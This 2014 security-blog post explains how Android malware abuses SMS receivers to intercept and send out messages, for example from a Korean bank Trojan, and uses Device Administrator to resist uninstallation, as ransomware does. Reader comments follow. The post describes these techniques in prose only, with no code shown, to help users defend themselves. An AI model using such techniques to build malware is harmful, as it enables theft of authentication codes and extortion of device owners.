OFFICIAL SECURITY BLOG

Android Features Used Maliciously

July 25, 2014 | BY

We hear a lot about the high amount of Android malware running rampant. An interesting tidbit is a vast majority of malware doesn’t need any special ‘magic’ to behave maliciously. They use existing functionality to attack users, functionality available to all developers.

We’ll take a look at a couple of these methods in which malware is able utilize,  once their permission request is granted and the app is installed.

SMS Receivers

This first method is monitoring incoming SMS. Malware can use SMS to send premium messages, sign you up for paid services, send spam, and a lot more.

Let’s look at the RECEIVE_SMS permission, used heavily by bank Trojans to capture authentication codes and other information related to an account. With this permission granted the malware will create a ‘Receiver’ to monitor incoming SMS.

Once an SMS message is captured, it can do a variety of things like abort the message notification, delete, and collect the contents of the message.

The example here shows how a Korean bank Trojan collects an incoming SMS message, sends to a remote server, and then aborts the notification. The data sent includes the compromised device’s phone number, incoming number, and message contents.

This slideshow requires JavaScript.

Many apps request to send or receive SMS so the permission request can often be overlooked when installing. The challenge is we can’t see what goes on behind the scenes so SMS could be sent, received, deleted, and contents sniffed without our knowledge. We just have to hope Google is keeping us secure.

Device Administrator

Another feature exploited is the security setting “Device Administrators.” Introduced in Android 2.2 it was put in place to help IT department’s better secure corporate Android devices. When an app is defined here, system administrators can enforce policies for devices such as password strength, locking device, and remote wipe.

When an app is listed as an administrator it needs additional steps to uninstall, the app must first be deactivated from Device Administrators.

Malware authors typically use this functionality to prevent an app from being uninstalled.

In this example, Device Administrator is used to prevent uninstalling as usual, but by monitoring events such as the Action DEVICE_ADMIN_DISABLE_REQUESTED, this ransomware is able to block the deactivation attempt. Even in Safe Mode, where only system apps should be started it is able to block deactivation, making this guy even more difficult to remove.

This slideshow requires JavaScript.

Ransomware, like Koler, SimpLocker, and FBILocker, are becoming more of a nuisance incorporating methods like this, making them even more difficult to remove. Early variants would not block a users access to the device, so if you didn’t fall for the scam you could easily uninstall.

You can review which apps you have installed that are Device Administrators through your Android settings. Settings -> Security -> Device Administrators.

These are just a couple of examples of how malware uses existing Android’s features in malicious ways. We suggest you review permissions before installing apps and backing up your data.

Give a second thought to apps requesting to be Device Administrators.


  • Jasmin

    I just want to thank you for this very shocking informative article Armando. However, I just wanted to ask you about one point. Based on the examples you’ve provided, the targeted device was infected with a malware which turned it into a harbor for child *********** and zoophilia *********** material. I am completely shocked!!

    1) What is the purpose of infecting the device in this way? Is it used as a carrier to send this material to other targets?

    2) Isn’t there some kind of law enforcement department which tries to apprehend the network which is responsible for the illegal deeds which have been perpetrated?

    Thank you

  • Daniel

    Nice article, nice to see some code snippets of how it’s done.

  • Gil Henderson

    No Jasmin, it only pretends that is the case.

  • http://grampiantradesmen.co.uk/ rekcuskcid halla

    Where are the times when my “cellular” Siemens S6 was t5he size of a baby, battery lasted two weeks and all it did was making/receiving calls and text allright :D

  • Jasmin

    Ah, Ok. I see now how things are. It is part of the malicious app’s behavior. I thought that it really did download those material into the phone. Thank you for your clarification.

  • dale lessard

    microsoft is controlling everything now i cant get netflix or anything i change things and they change them back i also got hacked from a microsoft office i want it to stop AND THEY JUST MADE THIS PASSWORD NOT WORK

  • Pingback: Tech Thoughts Daily Net News – July 29, 2014 | Bill Mullins' Weblog - Tech Thoughts

  • steven sanders

    my android phone has been blocked fbi ransomware and I cant use my device please help